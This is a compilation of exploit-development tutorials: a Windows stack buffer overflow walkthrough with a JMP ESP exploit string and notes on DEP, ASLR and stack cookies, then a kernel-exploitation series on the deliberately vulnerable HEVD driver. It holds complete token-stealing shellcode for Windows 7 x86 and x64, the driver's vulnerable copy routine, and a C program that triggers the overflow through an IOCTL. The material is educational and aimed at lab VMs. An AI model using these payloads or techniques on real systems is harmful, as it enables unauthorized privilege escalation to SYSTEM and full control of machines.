As you can see, the first 20 bytes (the first 5 lines) represent the content of the “buffer”. We specified a string of 12 bytes (“111122223333”) and the rest of the buffer holds junk data (it is not initialized with NULLs). However, please note that right after “3333” we have the following data: 770F8600. The lowest byte (00) is a NULL byte that was added by the “strcpy” function. Because each line is displayed as a little-endian dword, that 00 is the first byte in memory after “3333”.
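To make the last point concrete, here is a minimal sketch that copies the same 12-character string into a 20-byte buffer and reads it back as little-endian dwords, the way the debugger displays them. The helper names and the 0x77 junk byte are assumptions made for this illustration; real stack junk will be whatever was there before.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Read 4 bytes as one little-endian 32-bit value, the way the debugger
   shows each stack slot. */
uint32_t read_dword_le(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Copy a short string into a 20-byte buffer pre-filled with a junk byte and
   return the dword found at the given byte offset. The junk value 0x77 is
   hypothetical; it only stands in for uninitialized stack content. */
uint32_t dword_after_copy(const char *s, size_t offset)
{
    unsigned char buffer[20];

    assert(strlen(s) < sizeof(buffer));   /* keep this demo in bounds */
    assert(offset + 4 <= sizeof(buffer));

    memset(buffer, 0x77, sizeof(buffer)); /* simulated junk */
    strcpy((char *)buffer, s);            /* copies the chars plus one 0x00 */
    return read_dword_le(buffer + offset);
}
```

Calling dword_after_copy("111122223333", 12) returns a dword whose lowest byte is 00 while the other three bytes are still junk, which is the same pattern as 770F8600 in the dump above.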
Now we can ask the question: “What will happen if the string parameter is longer than 20 bytes”? As you can probably guess, the answer is “We get a stack based buffer overflow”.
Exploitation
Let’s get back to the stack and see what we have there:
The “buffer” (20 bytes)
The Display function’s EBP
The Return Address
The parameter (the string)
What can go wrong? Let’s remember what happens when a function returns (on the RETN instruction): the execution continues from the “Return Address”. So, if we overflow the stack and overwrite the “Return Address” with something else… we can control the execution of the program!
This is what will happen if we will use a string parameter of 28 bytes, instead of the maximum number of 20.
We will modify the call “Display(“111122223333”);” to “Display(“1111222233334444555566667777”);“. The stack will look like this:
00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 34343434 | "4444"
00B9FEE0 | 35353535 | "5555"
00B9FEE4 | 36363636 | "6666" - EBP saved on Display function first instruction
00B9FEE8 | 37373737 | "7777" - Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function
This means that when the execution of the “Display” function finishes (at the RETN instruction), the execution will jump to the address “0x37373737”. So, in conclusion, the EIP value will be 0x37373737, a value that we control.
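The same overwrite can be reproduced safely on a model of the frame. The sketch below is only an illustration: it uses a plain byte array instead of the real stack, assumes the 20 + 4 + 4 byte layout shown in the dump, and ignores the terminating NULL byte that strcpy would also write.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simplified model of Display's frame: a 20-byte buffer, then the saved EBP,
   then the return address. Offsets follow the stack dump in the article. */
enum { EBP_OFF = 20, RET_OFF = 24, FRAME_SIZE = 28 };

struct frame_view {
    uint32_t saved_ebp;
    uint32_t return_address;
};

static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void store_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xFFu);
    p[1] = (unsigned char)((v >> 8) & 0xFFu);
    p[2] = (unsigned char)((v >> 16) & 0xFFu);
    p[3] = (unsigned char)((v >> 24) & 0xFFu);
}

/* Copy the input over the modelled frame without checking it against the
   20-byte buffer, then report what the saved EBP and return address became. */
struct frame_view simulate_overflow(const char *input)
{
    unsigned char frame[FRAME_SIZE] = {0};
    struct frame_view view;
    size_t n = strlen(input);

    assert(n <= FRAME_SIZE);                  /* stay inside the model */
    store_le32(frame + EBP_OFF, 0x00B9FEF0u); /* values taken from the dump */
    store_le32(frame + RET_OFF, 0x000E103Du);

    memcpy(frame, input, n);                  /* the unchecked copy */

    view.saved_ebp = load_le32(frame + EBP_OFF);
    view.return_address = load_le32(frame + RET_OFF);
    return view;
}
```

With the 12-byte string the return address stays 0x000E103D; with the 28-byte string it becomes 0x37373737 and the saved EBP becomes 0x36363636.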
After the RETN instruction, the return address will be removed from the stack. This means that the top of the stack, the ESP register, will point to the address: 0x00B9FEEC. We can see that if we use a string larger than 28 bytes (20 bytes buffer + 4 bytes saved EBP + 4 bytes return address) we will overwrite data on stack. Since the ESP value will point to something that we control, how can we easily execute arbitrary code?
There are two things we control:
The return address (EIP)
The data at the top of the stack (ESP)
The easiest solution is to find a “JMP ESP” instruction. For example, let’s assume that the code of our program, or one of the DLLs, has a JMP ESP instruction at address 0x12345678. What we will do is replace the return address (“0x37373737” in our example) with the address of this instruction (0x12345678). This redirects the execution of the program to the top of the stack, where we can place any code and do whatever we want with the program!
Let’s open the program in x64dbg, an open-source debugger. A debugger is a program that allows you to open a program and step through its instructions, so you can see the contents of the memory or the register values at runtime. It is a powerful tool with multiple features. Looking at the top of the SBOF.exe program, we can see our two functions. Below is a screenshot.
Click each “PUSH EBP” instruction at the beginning of the functions and press F2. This places a breakpoint, so when you run the program in the debugger, it will stop at those instructions. You can use F7 to step into each instruction, or F8 to step over: F8 also executes one instruction at a time, but on CALL instructions it runs the whole function call instead of entering it. Pressing F9 runs the program until the debugger hits a breakpoint or an error occurs. It is very useful to play around with the debugger to see how powerful its features are.
Now, in order to keep the things simple, we will modify the code to contain the “JMP ESP” instruction. We will add the following function:
// Function that does nothing, it just contains a jmp esp
void Nothing()
{
__asm
{
jmp esp;
}
}
As you can see in the debugger, the program contains also some other instructions and it uses DLLs (such as kernel32.dll, ntdll.dll) which also contain a lot of code. We can use all this code to search for a JMP ESP instruction inside it. Right click, go to “Search for” > “All Modules” > “Command”, type “jmp esp” and press OK.
In our case, with the new function that contains the “JMP ESP” instruction, we can find it at the following address:
01371033 | FF E4 | jmp esp |
Please note that you might have totally different addresses, since modern operating systems randomize memory addresses for security reasons. You will find more details later in this article.
So, in order to create a working proof of concept, we will have to do the following, to create the following string:
First 20 bytes will be the buffer
Second 4 bytes will overwrite the saved EBP
Following 4 bytes will be 0x01371033 – the address of the JMP ESP instruction
The next bytes will represent the code we want to execute
So, let’s change the main function to the following:
int main()
{
Display("111122223333444455556666\x33\x10\x37\x01\xcc\xcc\xcc\xcc");
}
As you can see, our string contains the 0x01371033 address, but in reverse order! This is because the data is stored as “little endian” in memory, as we discussed in the first part of the article. The following “cc”s represent the “INT 3” instruction, an instruction that pauses the program in the debugger as if we had set a breakpoint.
We can replace this with a shellcode. A shellcode is special code, most of the time written in Assembly, that works directly once assembled, wherever it is placed in memory. Normal machine code will not work this way: its strings, for example, are placed in different memory regions, and the code already knows the addresses of the functions it calls. In a shellcode, the strings are placed in the same place as the code, and the shellcode finds the addresses of the functions by itself. If you want to know in detail how a shellcode works on Windows and how you can manually write one, I recommend the following articles:
Please note that all this data must not contain a NULL byte. As the vulnerable call is a call to “strcpy” function, the “strcpy” function will stop execution when it will encounter the first NULL byte and we will not have all the data copied.
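The layout and the NULL byte constraint can be sketched together in a few lines. This is an illustrative helper, not part of the original program: the function names and the 'A' filler are assumptions, and the address 0x01371033 is only valid for the build shown above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* 20 bytes of buffer + 4 bytes of saved EBP, then the address, then 4 x INT 3 */
enum { FILLER_LEN = 24, PAYLOAD_LEN = FILLER_LEN + 4 + 4 };

/* Return 1 if buf[0..len) contains no zero byte, 0 otherwise. */
int is_null_free(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0)
            return 0;
    }
    return 1;
}

/* Write filler + little-endian JMP ESP address + four 0xCC bytes into out,
   followed by a terminating zero. Returns 1 on success, or 0 if out is too
   small or the payload contains a NULL byte that would stop strcpy early. */
int build_payload(uint32_t jmp_esp_addr, unsigned char *out, size_t out_size)
{
    assert(out != NULL);
    if (out_size < (size_t)PAYLOAD_LEN + 1)
        return 0;

    memset(out, 'A', FILLER_LEN);                      /* hypothetical filler */
    out[FILLER_LEN + 0] = (unsigned char)(jmp_esp_addr & 0xFFu);
    out[FILLER_LEN + 1] = (unsigned char)((jmp_esp_addr >> 8) & 0xFFu);
    out[FILLER_LEN + 2] = (unsigned char)((jmp_esp_addr >> 16) & 0xFFu);
    out[FILLER_LEN + 3] = (unsigned char)((jmp_esp_addr >> 24) & 0xFFu);
    memset(out + FILLER_LEN + 4, 0xCC, 4);             /* INT 3 x 4 */
    out[PAYLOAD_LEN] = '\0';

    return is_null_free(out, PAYLOAD_LEN);
}
```

For 0x01371033 the address bytes come out as 33 10 37 01, matching the string passed to Display. An address such as 0x00371033 would be rejected, because its top byte is a NULL byte.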
Now, when we will execute this program, this will happen:
We exploited it! This is the result of the copied shellcode. We managed to execute arbitrary code, code that we supplied and got full access to the execution of the program.
Now, you might think this is not a useful example. Of course it is not, it is for educational purposes. A program might get the string from the command line, or from the network, and the same thing might happen. Here are some common cases where this vulnerability might be present:
Getting data from the command line
Parsing a document (such as XML, HTML, PDF)
Reading data from the network (such as a FTP server, HTTP server)
Protection mechanisms
There are a few protections built to protect against this type of attack. All modern compilers and operating systems should have them.
DEP – Data Execution Prevention – is a protection mechanism that works at both the hardware level (NX bit – “No eXecute”) and the software level. It does not allow the execution of code from memory regions that do not have the “execute” permission. A memory page can have “read”, “write” and/or “execute” permissions. For example, a memory region containing data, such as strings, can have “read” or “read-write” permissions, and a memory region containing code will have “read-execute” permissions. The stack, which has read-write permissions, is a memory region from which it should not be possible to execute code. Without DEP this is possible; with DEP, execution of code from the stack is blocked. As you can probably understand, our shellcode was executed from the stack, so this protection will block our attack. It can be enabled from “Configuration Properties” > “Linker” > “Advanced” > “Data Execution Prevention (DEP)”.
ASLR – Address Space Layout Randomization – was introduced in Windows Vista, which is the reason why it is easier to understand this vulnerability on Windows XP. It is another mechanism that can protect against this type of attack. As we discussed, the DLLs and the executable can contain different instructions, such as “JMP ESP”, that attackers can use. Before ASLR, the executable and the DLLs were always loaded in memory at the same address. For example, the SBOF.exe code would always start at 0x10002000 and kernel32.dll might always be loaded at some fixed address. This means that attackers can rely on the instructions from those binaries. With ASLR, all modules, and also the stack and the heap memory, are loaded at random addresses. We can still find the address of a JMP ESP instruction, but it will not work on another machine, because the module containing the instruction is loaded there at a different (randomly generated) address. It is possible to activate this feature from “Configuration Properties” > “Linker” > “Advanced” > “Randomized Base Address”.
Stack Cookies – This is another protection mechanism, built specifically against this type of attack, and it is offered by the compiler. It works by placing a random value called a “stack cookie” on the stack at the beginning of a function, between the local variables (such as our buffer) and the saved EBP and return address. A stack based buffer overflow overwrites the data following the buffer, so it also overwrites this random value. Before the “RETN” instruction, the protection checks the value of the stack cookie. If a stack based buffer overflow occurred, the value has changed and the verification fails, so the program is forcibly stopped and the shellcode is not executed. This protection can be configured from “Configuration Properties” > “C/C++” > “Code Generation” > “Security Check”.
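The idea behind the stack cookie check can be sketched on a modelled frame. This is a simplified illustration of the concept, not what the compiler actually emits: the layout, the function name and the cookie value are assumptions.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Modelled frame: 20-byte buffer, 4-byte cookie, saved EBP, return address. */
enum { COOKIE_OFF = 20, FRAME_SIZE = 32 };

/* Place the cookie after the buffer (what the function prologue would do),
   perform an unchecked copy, then compare the cookie again (what happens
   before RETN). Returns 1 if the cookie is intact, 0 if it was overwritten. */
int cookie_survives(const char *input, uint32_t cookie)
{
    unsigned char frame[FRAME_SIZE];
    uint32_t after;
    size_t n = strlen(input) + 1;  /* strcpy also copies the terminator */

    assert(n <= FRAME_SIZE);       /* stay inside the model */

    memset(frame, 0, sizeof(frame));
    memcpy(frame + COOKIE_OFF, &cookie, sizeof(cookie)); /* prologue */
    memcpy(frame, input, n);                             /* unchecked copy */
    memcpy(&after, frame + COOKIE_OFF, sizeof(after));   /* epilogue check */

    return after == cookie;
}
```

A 12-character input leaves the cookie untouched, while the 28-character input from the exploitation example overwrites it on its way to the return address, so the check fails before the corrupted return address is ever used.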
Conclusion
Even if it is not difficult to understand this type of vulnerability, the main difficulty is learning a few concepts such as Assembly language and how programs work under the hood. Due to existing protection mechanisms, real-life exploitation of this type of vulnerability is way more difficult. However, there are a few tricks that can be used in certain situations to bypass some of the protections (if others are not present), but this is not the purpose of this article.
My suggestion, in order to properly understand this vulnerability, would be to compile a program like this, disable all protections and see what happens. You can modify the size of the buffer, but the most important thing is to go instruction by instruction and understand everything in detail. You can download the source code of the above example from here.
If you have any questions, please leave a comment here or use the contact email.
This N-part tutorial will walk you through the kernel exploit development cycle. It’s important to notice that we will be dealing with known vulnerabilities, no reversing is needed (for the driver at least).
By the end of tutorial, you should be familiar with common vulnerability classes and how they’re exploited, able to port exploits from x86 to x64 arch (if possible) and be familiar with newer mitigations in Windows 10.
What’s kernel debugging?
Unlike user-mode debugging where you can pause execution of a single process, kernel-mode debugging breaks on the entire system, meaning you won’t be able to use it at all. A debugger machine is needed so you can communicate with the debuggee, observe memory or kernel data structures, or catch a crash.
The main goal is to gain execution with kernel-mode context. A successful exploit could result in elevated permissions and what you can do is only bound by your imagination (anywhere from cool homebrew to APT-sponsored malware).
Goal for this tutorial is getting a shell with SYSTEM permissions.
How will this tutorial be organized?
Part 1: Setting up the environment
Configure the 3 VMs + debugger machine.
Configure WinDBG.
Part 2: Payloads
Placeholder for common payloads to be used later, this will allow us to focus on vulnerability-specific details in future posts and refer to this post when needed.
Part 3-N:
One or more post per vulnerability.
Kernel exploit development lifecycle
Finding a vulnerability: This won’t be covered in this tutorial as we already know exactly where the vulnerabilities are.
Hijacking execution flow: Some vulnerabilities allow code execution, others require more than that.
Privilege escalation: Main goal will be to get a shell with SYSTEM privileges.
Restore execution flow: Uncaught exceptions in kernel-mode result in a system crash. Unless a DoS exploit makes you sleep at night we need to address this.
What are the targets?
Exploitation will be attempted on the following targets (no specific version is needed yet):
a Win7 x86 VM
a Win7 x64 VM
a Win10 x64 VM
Normally we’ll start with the x86 machine, followed by porting it to the Win7 x64 one. Some exploits won’t run on the Win10 machine due to some newer mitigations that are added. We’ll either have to tweak the exploit or come up with an entirely different approach.
The debuggee is our guinea pig. We’ll use it to load the vulnerable driver and communicate with it. This machine will crash a lot as most exceptions in kernel will result in BSOD. Make sure you give it enough RAM.
Per debuggee:
Inside the VirtualKD folder, run target\vminstall.exe. This will add a boot entry that has debugging enabled and connects automatically to the VirtualKD server on the debugger machine.
For the Windows 10 VM, you need to enable test signing. This allows you to load unsigned drivers into the kernel.
Running bcdedit /set testsigning on and rebooting will show “Test Mode” on the desktop.
NOTE: Windows 10 supports communicating through the network and in my experience is usually faster. To do that, follow this.
Run the OSR Driver Loader, register the service then start it. You may need to reboot.
Optional: Install VM guest additions.
Set up a low-priv account, this should be used while exploiting.
C:\Windows\system32>net user low low /add
The command completed successfully.
Setting up the debugger machine
This machine will be the one debugging the debuggee machine through WinDBG. You’ll be able to inspect memory and data structures and manipulate them if needed. Having a remote debugging session running when the debuggee crashes allows us to break into the VM and/or analyze a crash.
VirtualKD host will automatically communicate with a named pipe instead of setting it up manually. If you’re network debugging the Win10 VM, you’ll need to test the connection manually.
Install the Windows SDK (link). You can select the “Debugging Tools for Windows” only.
Verify that WinDBG is installed, Win10 SDK is by default installed in C:\Program Files (x86)\Windows Kits\10\Debuggers.
Add it to the system path and set up the debugger path in VirtualKD.
Reboot one of the debuggee machines while the VirtualKD host is running on the debugger. You should be able to start a WinDBG session.
Setting up WinDBG
If everything is set up correctly, WinDBG will pause execution and print some info about the debuggee.
Symbols contain debugging information for lots of Windows binaries. We can get them by executing the following:
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) {
    UINT32 i = 0;
    PDEVICE_OBJECT DeviceObject = NULL;
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
    UNICODE_STRING DeviceName, DosDeviceName = {0};

    UNREFERENCED_PARAMETER(RegistryPath);
    PAGED_CODE();

    RtlInitUnicodeString(&DeviceName, L"\\Device\\HackSysExtremeVulnerableDriver");
    RtlInitUnicodeString(&DosDeviceName, L"\\DosDevices\\HackSysExtremeVulnerableDriver");

    // Create the device
    Status = IoCreateDevice(DriverObject,
                            0,
                            &DeviceName,
                            FILE_DEVICE_UNKNOWN,
                            FILE_DEVICE_SECURE_OPEN,
                            FALSE,
                            &DeviceObject);

    ...
}
This routine contains an IoCreateDevice call that contains the driver name we’ll be using to communicate with it.
DriverObject will get populated with the necessary structures and function pointers.
In HEVD, this function is called IrpDeviceIoCtlHandler and it’s basically a large switch case for every IOCTL. Every vulnerability has a unique IOCTL.
Example: HACKSYS_EVD_IOCTL_STACK_OVERFLOW is the IOCTL used to trigger the stack overflow vulnerability.
That’s it! Next post will discuss payloads. For now, it’ll only include a generic token-stealing payload that’ll be used for part 3.
I’m aware this post doesn’t cover lots of issues you can run into. Due to the scope of this tutorial, you’ll need to figure out a lot on your own, but you’re welcome to comment with your questions if needed.
Sometimes you’re able to control the return address of a function, in this case you can point it to your user-mode buffer only if SMEP is disabled.
Payloads have to reside in an executable memory segment. If you define it as a read-only hex string or any other combination that doesn’t have execute permissions, shellcode execution will fail due to DEP (Data Execution Prevention).
Payloads are in assembly. Unless you enjoy copying hex strings, I recommend compiling ASM on the fly in a Visual Studio project. This works for x86 and x64 payloads and saves you the headache of removing function prologues/epilogues, creating a RWX buffer and copying shellcode or not being able to write x64 ASM inline.
Lots of other options exist like 1) using masm and copying shellcode to a RWX buffer at runtime, 2) using a naked function but that’s only for x86 or 3) inline ASM which again works only for x86.
Every Windows process is represented by an EPROCESS structure.
dt nt!_EPROCESS optional_process_address
Most of the EPROCESS structure exists in kernel-space, while the PEB exists in user-space so user-mode code can interact with it. This structure can be shown using dt nt!_PEB optional_process_address or !peb if you’re in a process context.
kd> !process 0 0 explorer.exe
PROCESS ffff9384fb0c35c0
SessionId: 1 Cid: 0fc4 Peb: 00bc3000 ParentCid: 0fb4
DirBase: 3a1df000 ObjectTable: ffffaa88aa0de500 HandleCount: 1729.
Image: explorer.exe
kd> .process /i ffff9384fb0c35c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff802`80002c60 cc int 3
kd> !peb
PEB at 0000000000bc3000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
...
The EPROCESS structure contains a Token field that tells the system what privileges this process holds. A privileged process (like System) is what we aim for. If we’re able to steal this token and overwrite the current process’s token with that value, the current process will run with higher privileges than it’s intended to. This is called privilege escalation/elevation.
Offsets differ per operating system, you’ll need to update payloads with the appropriate values. WinDBG is your friend.
Token Stealing Payload
Imagine we can execute any code we want with the goal of replacing the current process token with a more privileged one, where do we go? PCR struct is an excellent option for us as its location doesn’t change. With some WinDBG help we’ll be able to find the EPROCESS of the current process and replace its token with that of System (PID 4).
More of the same, EPROCESS address is at _KTHREAD.ApcState.Process.
5. Locating SYSTEM EPROCESS
Using _EPROCESS.ActiveProcessLinks.Flink linked list we’re able to iterate over processes. Every iteration we need to check if UniqueProcessId equals 4 as that’s the System process PID.
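The walk itself is easier to follow in C than in assembly. The sketch below runs on mock structures in user mode: mock_eprocess is a hypothetical, heavily simplified stand-in for _EPROCESS (the real layout and offsets differ per Windows version), and link_processes is a helper invented here to build a circular list for testing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
};

/* Mock process object, NOT the real _EPROCESS layout. */
struct mock_eprocess {
    uintptr_t unique_process_id;
    struct list_entry active_process_links;
    uintptr_t token;
};

/* Go from a list entry back to the structure that contains it. This is what
   the "sub eax, 0B8h" after following Flink does in the payload. */
#define CONTAINING_PROCESS(entry) \
    ((struct mock_eprocess *)((char *)(entry) - \
        offsetof(struct mock_eprocess, active_process_links)))

/* Follow Flink from the starting process until a process with the wanted
   PID is found. Returns NULL after one full loop without a match. */
struct mock_eprocess *find_process(struct mock_eprocess *start, uintptr_t pid)
{
    struct list_entry *entry;

    assert(start != NULL);
    entry = start->active_process_links.flink;
    while (entry != &start->active_process_links) {
        struct mock_eprocess *proc = CONTAINING_PROCESS(entry);
        if (proc->unique_process_id == pid)
            return proc;
        entry = entry->flink;
    }
    return start->unique_process_id == pid ? start : NULL;
}

/* Test helper: link an array of mock processes into a circular list. */
void link_processes(struct mock_eprocess *procs, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        size_t next = (i + 1) % count;
        size_t prev = (i + count - 1) % count;
        procs[i].active_process_links.flink = &procs[next].active_process_links;
        procs[i].active_process_links.blink = &procs[prev].active_process_links;
    }
}
```

Starting from any process in the list, find_process(current, 4) returns the mock System process, whose token field is what the payload reads next.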
6. Replacing the token
If it’s a match we overwrite the target process Token with that of SYSTEM.
Notice that Token is of type _EX_FAST_REF and the lower 4 bits aren’t part of it.
Normally you want to keep that value when replacing the token, but I haven’t run into issues for not replacing it before.
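Keeping the low bits while swapping the pointer part is a small masking exercise. The sketch below assumes the 4 low bits mentioned above and uses hypothetical token values; the function names are made up for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Low bits of _EX_FAST_REF that hold the reference count rather than the
   pointer. 4 bits is assumed here, following the text above. */
#define FAST_REF_MASK 0xFull

/* Strip the reference count bits to get the token pointer itself. */
uint64_t token_pointer(uint64_t fast_ref)
{
    return fast_ref & ~FAST_REF_MASK;
}

/* Build the value to write into the current process: the SYSTEM token
   pointer combined with the current token's own reference count bits. */
uint64_t replace_token(uint64_t current_fast_ref, uint64_t system_fast_ref)
{
    uint64_t result = token_pointer(system_fast_ref) |
                      (current_fast_ref & FAST_REF_MASK);

    /* The pointer part must come from SYSTEM, the low bits from us. */
    assert(token_pointer(result) == token_pointer(system_fast_ref));
    return result;
}
```

For example, with a current value ending in 7 and a SYSTEM value ending in b, the result keeps the SYSTEM pointer and ends in 7.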
Token Stealing Payload Windows 7 x86 SP1
.386
.model flat, c                  ; cdecl / stdcall
ASSUME FS:NOTHING
.code
PUBLIC StealToken

StealToken proc
    pushad                              ; Save registers state

    ; Start of Token Stealing Stub
    xor eax, eax                        ; Set ZERO
    mov eax, DWORD PTR fs:[eax + 124h]  ; Get nt!_KPCR.PcrbData.CurrentThread
                                        ; _KTHREAD is located at FS : [0x124]
    mov eax, [eax + 50h]                ; Get nt!_KTHREAD.ApcState.Process
    mov ecx, eax                        ; Copy current process _EPROCESS structure
    mov edx, 04h                        ; WIN 7 SP1 SYSTEM process PID = 0x4

SearchSystemPID:
    mov eax, [eax + 0B8h]               ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
    sub eax, 0B8h
    cmp [eax + 0B4h], edx               ; Get nt!_EPROCESS.UniqueProcessId
    jne SearchSystemPID

    mov edx, [eax + 0F8h]               ; Get SYSTEM process nt!_EPROCESS.Token
    mov [ecx + 0F8h], edx               ; Replace target process nt!_EPROCESS.Token
                                        ; with SYSTEM process nt!_EPROCESS.Token
    ; End of Token Stealing Stub
StealToken ENDP
end
Token Stealing Payload Windows 7 x64
.code
PUBLIC GetToken

GetToken proc
    ; Start of Token Stealing Stub
    xor rax, rax                        ; Set ZERO
    mov rax, gs:[rax + 188h]            ; Get nt!_KPCR.PcrbData.CurrentThread
                                        ; _KTHREAD is located at GS : [0x188]
    mov rax, [rax + 70h]                ; Get nt!_KTHREAD.ApcState.Process
    mov rcx, rax                        ; Copy current process _EPROCESS structure
    mov r11, rcx                        ; Store Token.RefCnt
    and r11, 7
    mov rdx, 4h                         ; WIN 7 SP1 SYSTEM process PID = 0x4

SearchSystemPID:
    mov rax, [rax + 188h]               ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
    sub rax, 188h
    cmp [rax + 180h], rdx               ; Get nt!_EPROCESS.UniqueProcessId
    jne SearchSystemPID

    mov rdx, [rax + 208h]               ; Get SYSTEM process nt!_EPROCESS.Token
    and rdx, 0fffffffffffffff0h
    or rdx, r11
    mov [rcx + 208h], rdx               ; Replace target process nt!_EPROCESS.Token
                                        ; with SYSTEM process nt!_EPROCESS.Token
    ; End of Token Stealing Stub
GetToken ENDP
end
NTSTATUS TriggerStackOverflow(IN PVOID UserBuffer, IN SIZE_T Size) {
    NTSTATUS Status = STATUS_SUCCESS;
    ULONG KernelBuffer[BUFFER_SIZE] = {0};

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(KernelBuffer));

        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%X\n", sizeof(KernelBuffer));

#ifdef SECURE
        // Secure Note: This is secure because the developer is passing a size
        // equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,
        // there will be no overflow
        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
#else
        DbgPrint("[+] Triggering Stack Overflow\n");

        // Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
        // because the developer is passing the user supplied size directly to
        // RtlCopyMemory()/memcpy() without validating if the size is greater or
        // equal to the size of KernelBuffer
        RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}
TriggerStackOverflow is called via StackOverflowIoctlHandler, which is the IOCTL handler for HACKSYS_EVD_IOCTL_STACK_OVERFLOW.
Vulnerability is fairly obvious, a user supplied buffer is copied into a kernel buffer of size 2048 bytes (512 * sizeof(ULONG)). No boundary check is being made, so this is a classic stack smashing vulnerability.
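For comparison, this is roughly what a boundary check looks like. The sketch is a user-mode illustration with plain memcpy, not driver code, and it differs from the SECURE branch above: instead of always copying sizeof(KernelBuffer) bytes, it rejects any request larger than the destination. The function name and return convention are assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { BUFFER_SIZE = 512 };  /* 512 * sizeof(uint32_t) = 2048 bytes */

/* Copy size bytes from src into dst only if they fit into dst_size bytes.
   Returns 0 on success and -1 if the request would overflow dst. */
int checked_copy(void *dst, size_t dst_size, const void *src, size_t size)
{
    assert(dst != NULL && src != NULL);
    if (size > dst_size)
        return -1;           /* this is the check the vulnerable path lacks */
    memcpy(dst, src, size);
    return 0;
}
```

With a 2048-byte destination, a 2200-byte request like the one used to trigger the crash below is refused, while a request of exactly 2048 bytes succeeds.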
2. Triggering the crash
#include <Windows.h>
#include <stdio.h>
// IOCTL to trigger the stack overflow vuln, copied from HackSysExtremeVulnerableDriver/Driver/HackSysExtremeVulnerableDriver.h
#define HACKSYS_EVD_IOCTL_STACK_OVERFLOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS)
int main() {
    // 1. Create handle to driver
    HANDLE device = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
        NULL);

    printf("[+] Opened handle to device: 0x%x\n", device);

    // 2. Allocate memory to construct buffer for device
    char* uBuffer = (char*)VirtualAlloc(NULL, 2200, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    printf("[+] User buffer allocated: 0x%x\n", uBuffer);

    RtlFillMemory(uBuffer, 2200, 'A');

    DWORD bytesRet;

    // 3. Send IOCTL
    DeviceIoControl(device, HACKSYS_EVD_IOCTL_STACK_OVERFLOW, uBuffer, 2200, NULL, 0, &bytesRet, NULL);
}
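If you’re curious what number the CTL_CODE macro above expands to, the packing can be reproduced in portable C. The sketch below mirrors the bit layout used by the Windows headers; the DEMO_ constants are local copies of the header values so the code compiles without Windows.h, and ctl_code is a name chosen for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Local copies of the values from the Windows headers. */
#define DEMO_FILE_DEVICE_UNKNOWN 0x00000022u
#define DEMO_METHOD_NEITHER      3u
#define DEMO_FILE_ANY_ACCESS     0u

/* Pack an IOCTL code the same way CTL_CODE does:
   device type in bits 16-31, access in bits 14-15,
   function in bits 2-13, transfer method in bits 0-1. */
uint32_t ctl_code(uint32_t device_type, uint32_t function,
                  uint32_t method, uint32_t access)
{
    assert(device_type <= 0xFFFFu);
    assert(function <= 0xFFFu);
    assert(method <= 3u && access <= 3u);
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}
```

ctl_code(DEMO_FILE_DEVICE_UNKNOWN, 0x800, DEMO_METHOD_NEITHER, DEMO_FILE_ANY_ACCESS) evaluates to 0x222003, which is the raw value you’ll see when inspecting the IOCTL in a debugger.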
Now compile this code and copy it over to the VM. Make sure a WinDBG session is active and run the executable from a shell. Machine should freeze and WinDBG should (okay, maybe will) flicker on your debugging machine.
HEVD shows you debugging info with verbose debugging enabled:
Enter k to show the stack trace, you should see something similar to this:
kd> k
# ChildEBP RetAddr
00 8c812d0c 8292fce7 nt!RtlpBreakWithStatusInstruction
01 8c812d5c 829307e5 nt!KiBugCheckDebugBreak+0x1c
02 8c813120 828de3c1 nt!KeBugCheck2+0x68b
03 8c8131a0 82890be8 nt!MmAccessFault+0x104
04 8c8131a0 82888ff3 nt!KiTrap0E+0xdc
